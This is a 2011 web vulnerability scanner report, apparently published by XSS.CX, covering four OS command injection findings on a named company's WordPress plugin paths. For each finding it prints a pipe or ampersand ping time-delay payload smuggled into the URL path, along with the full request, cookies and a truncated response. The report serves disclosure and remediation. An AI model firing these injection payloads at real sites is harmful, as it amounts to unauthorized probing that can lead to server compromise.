Report generated by XSS.CX at Sat Apr 23 06:45:39 CDT 2011.


Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

1. OS command injection

1.1. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js [REST URL parameter 5]

1.2. http://www.ligattsecurity.com/wp-content/plugins/seo-pressor/templates/css/styles.css [REST URL parameter 2]

1.3. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/accordion.css [REST URL parameter 3]

1.4. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js [REST URL parameter 4]



1. OS command injection
There are 4 instances of this issue:

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:



1.1. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js [REST URL parameter 5]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ligattsecurity.com
Path:   /wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the REST URL parameter 5. The application took 52604 milliseconds to respond to the request, compared with 468 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js|ping%20-n%2020%20127.0.0.1||x HTTP/1.1
Host: www.ligattsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 09:23:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Last-Modified: Sat, 23 Apr 2011 09:24:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<t
...[SNIP]...

1.2. http://www.ligattsecurity.com/wp-content/plugins/seo-pressor/templates/css/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ligattsecurity.com
Path:   /wp-content/plugins/seo-pressor/templates/css/styles.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-c%2020%20127.0.0.1||x was submitted in the REST URL parameter 2. The application took 62088 milliseconds to respond to the request, compared with 94 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /wp-content/plugins|ping%20-c%2020%20127.0.0.1||x/seo-pressor/templates/css/styles.css HTTP/1.1
Host: www.ligattsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 08:29:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Last-Modified: Sat, 23 Apr 2011 08:30:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<t
...[SNIP]...

1.3. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/accordion.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ligattsecurity.com
Path:   /wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/accordion.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the REST URL parameter 3. The application took 56379 milliseconds to respond to the request, compared with 375 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /wp-content/plugins/superslider|ping%20-n%2020%20127.0.0.1||x/plugin-data/superslider/ssBase/blue/accordion.css HTTP/1.1
Host: www.ligattsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 08:24:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Last-Modified: Sat, 23 Apr 2011 08:25:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<t
...[SNIP]...

1.4. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js [REST URL parameter 4]  previous

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ligattsecurity.com
Path:   /wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the REST URL parameter 4. The application took 44273 milliseconds to respond to the request, compared with 484 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /wp-content/plugins/wp-prettyphoto/js%26ping%20-n%2020%20127.0.0.1%26/jquery.prettyPhoto.js HTTP/1.1
Host: www.ligattsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Apr 2011 09:06:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.ligattsecurity.com/xmlrpc.php
Last-Modified: Sat, 23 Apr 2011 09:07:26 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<t
...[SNIP]...

Report generated by XSS.CX at Sat Apr 23 06:45:39 CDT 2011.